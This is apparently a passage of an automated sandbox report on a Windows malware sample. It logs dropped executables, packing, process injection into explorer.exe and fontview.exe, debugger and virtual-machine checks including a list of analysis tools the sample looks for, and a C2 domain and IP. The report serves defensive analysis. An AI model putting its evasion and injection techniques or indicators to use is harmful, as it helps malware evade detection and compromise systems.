Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source: Binary string: ole32.pdbUGP source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\xayagejutuximo.pdb source: file.exe, beirutt.3.dr
Source: Binary string: winmm.pdb source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdbUGP source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: powrprof.pdb source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdb source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ole32.pdb source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sechost.pdbUGP source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbGCTL source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdbUGP source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: psapi.pdb source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp_win.pdbUGP source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: advapi32.pdbUGP source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptbase.pdb source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdbUGP source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bcryptprimitives.pdb source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cfgmgr32.pdb source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: combase.pdb source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: profapi.pdbUGP source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wmswsock.pdbUGP source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: oleaut32.pdb source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TC:\xayagejutuximo.pdb$~B|.@ source: file.exe, beirutt.3.dr
Source: Binary string: wuser32.pdb source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: comctl32.pdb source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2_32.pdbUGP source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\C676.exe Unpacked PE file: 6.2.C676.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Unpacked PE file: 10.2.43D0.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.juv:R;.rur:R;.cenepem:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\C676.exe Unpacked PE file: 6.2.C676.exe.400000.0.unpack .text:ER;.data:W;.huxuho:R;.gini:R;.vab:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Unpacked PE file: 10.2.43D0.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E378 push eax; ret 0_2_0040E396
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B6DDC push 6700D42Eh; retf 0_2_007B6DE6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007B5F84 push 623D8A45h; retf 0_2_007B5F89
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004363BD push esi; ret 6_2_004363C6
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004139F8 push ecx; ret 6_2_00413A0B
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_006AC6A8 pushad ; ret 6_2_006AC6AA
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_004051E9 push ecx; ret 7_2_004051FC
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040E378 push eax; ret 7_2_0040E396
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040A2E2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_0040A2E2
Source: file.exe Static PE information: section name: .juv
Source: file.exe Static PE information: section name: .rur
Source: file.exe Static PE information: section name: .cenepem
Source: C676.exe.3.dr Static PE information: section name: .huxuho
Source: C676.exe.3.dr Static PE information: section name: .gini
Source: C676.exe.3.dr Static PE information: section name: .vab
Source: beirutt.3.dr Static PE information: section name: .juv
Source: beirutt.3.dr Static PE information: section name: .rur
Source: beirutt.3.dr Static PE information: section name: .cenepem
Source: 4434343.dll.9.dr Static PE information: section name: .00cfg
Source: initial sample Static PE information: section name: .text entropy: 7.880058673023214
Source: initial sample Static PE information: section name: .text entropy: 7.648160210316085
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\beirutt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\43D0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe File created: C:\Users\user\AppData\Local\Temp\4434343.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\beirutt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C676.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C4AA.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: DLLREGISTERSERVERWKANIMHDMAWWV3SZQXYVBUPQC78ZCSCYZEXUSDVMOYWFSOSYSANDBOXK5IQR5XKKHFI0OIXFMGQKSOZVXBFCBSXP0CQKIPRNCYQHM3WLLXT6CDBBS26ESKV7845SWCP2EBLGWHVHDTWSOGZ9U9CGZZSDH2UM9TZTCXYZLXSGKNIDIWISTXFFJPSHTTP://GEKJEGOUDN6I5FBCES.JOMF6MTOBKL32EAI1QWQXSXPNFYV2SMICROSOFT BASIC DISPLAY ADAPTERAPXALPLEWOMRTXOQBIS5VVQOZJTDWDYPDWOJSVZO2QACQSIOYXZAFZ3U9IKX2BQN6EZZOXJP5PSUZKQMTGHZQELR5EG7GRIMERCTFOUNCFE4BGUM7H3R60PJIOCTMJ0M%LS\%D.DLLQU673JXMPB9XS6BLT0XDS1ALT0EJ5HLLAKOWFXNBJFIIOLTKI8WPBYDTNFYR40QJP9YSA5NKHRYBKS7IXE6TWUFX1EVDSUKHNIFAX TEGAWO NIP XEHN9YXFM4WGP9YUO5HXPMC4XQ1BZLDJLNGVBOXTRAY.EXEVMWARETRAY.EXEWECHAT.EXEVMWAREUSER.EXEFIDDLER.EXEPROCESSHACKER.EXEQQ.EXEPROCEXP.EXERDPCLIP.EXEWIRESHARK.EXEKAWEXI GEQUECI BOVOJ.EXEVBOXSERVICE.EXEVGAUTHSERVICE.EXEVMTOOLSD.EXEPRL_CC.EXEHTTPDEBUGGERUI.EXEHTTPANALYZERSTDV7.EXEPROCEXP64.EXE9VCQBULREEOHDRQECLOUDSAFELINEYQ7T94QZPUDEORTE80URPBYHQ3908APEYCDDGGZJIPRJTKOE8J4WDLLBX1APOW9EVBZ1UO2T2UBMGTUDBSQDYJSBALF5CGVCSFIMBSIBECUOLZPCIK2VP28IR0VTY4TBDYVLFRSD5XNE93CYIIGVV5KBWQ4W2ROU3OQVPIRDLVGRVMVTMQRP5J7SUNTW6WJSCCDMAYGHINOZWAXRSZKCI5FN6D9Y9HJRZHIX2JJ5NDQDFLBQ7GSN9CORX41KRUAQXIHNEOIQB1VONHHQFPG6N3LIJPAESKGQBMH2WFPZKMIH3JPNW2WWL4QOWW0SAVLN7QPQACULBYLOPUMLDJFMGRXYRKQKOVNJKRD4PQP2PQ8FNC7JABGGRSW4W0K7VSSICQYE9JT8N0NVH1MITQSNOGZQBXMIJYLHV2DLCZJ486OVC7EHTPLWZ4NT1DG4JSQGYZCQBMR6MBLZRXJGOXTXCYOA7FBPN0EGH7EX8DG8NSYCSAOGD5G0NV7R0LVA09KGCAWTJO5TB2I2LHAGZRMZ4T0EPASO079GSLJNUY5E4DLIUTNFLXFUZSNAEVRRIGWCHIYUGQ9HHPQODBLBIAQMME3ZWAAGKEJB4GPXYSRTR5EFN43BBTXITK2KKFOG8JCARLOY8GS3RRVRRJNAUFJSZGAKWZM2DEQ8OCWPZQ6O4RIWMRY77FLBKVUSFEYWTPB6Y2CTOYPQLWYAQAY5DNDXG1BSVPPP4JQ5WXP1OQ3Y3DHBZRC5X4KW1CN7YJDB9J450JE0S2RDQL7GXWP4ZKMA4WMYVM2YZR24ZUIL8P9X5RU6F5F2HM4YAEQ4STV1PKJ0
Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK760H
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\explorer.exe TID: 3980 Thread sleep count: 348 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5468 Thread sleep count: 211 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6076 Thread sleep count: 83 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3652 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\beirutt Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 854 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 844 Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4434343.dll Jump to dropped file
Source: C:\Windows\SysWOW64\fontview.exe Memory allocated: 5170000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000003.00000000.384012109.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000003.00000003.449577540.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWG5f(
Source: explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000003.00000003.450122194.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453871207.000000000D00E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00428390 FindFirstFileExW, 6_2_00428390
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\fontview.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040A2E2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_0040A2E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AF939 push dword ptr fs:[00000030h] 0_2_007AF939
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0041E1B1 mov ecx, dword ptr fs:[00000030h] 6_2_0041E1B1
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042950B mov eax, dword ptr fs:[00000030h] 6_2_0042950B
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_006A8C2B push dword ptr fs:[00000030h] 6_2_006A8C2B
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00413DCA
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042BCAF GetProcessHeap, 6_2_0042BCAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00414035
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00417E53
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413F2C SetUnhandledExceptionFilter, 6_2_00413F2C
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00408415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00408415
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00407A2B SetUnhandledExceptionFilter, 7_2_00407A2B
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040A6C7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040A6C7
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00406364 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00406364

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe File created: beirutt.3.dr Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory allocated: C:\Windows\SysWOW64\fontview.exe base: CD0000 protect: page read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Memory written: C:\Users\user\AppData\Local\Temp\43D0.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 4601B14 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 11C1008 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000 Jump to behavior
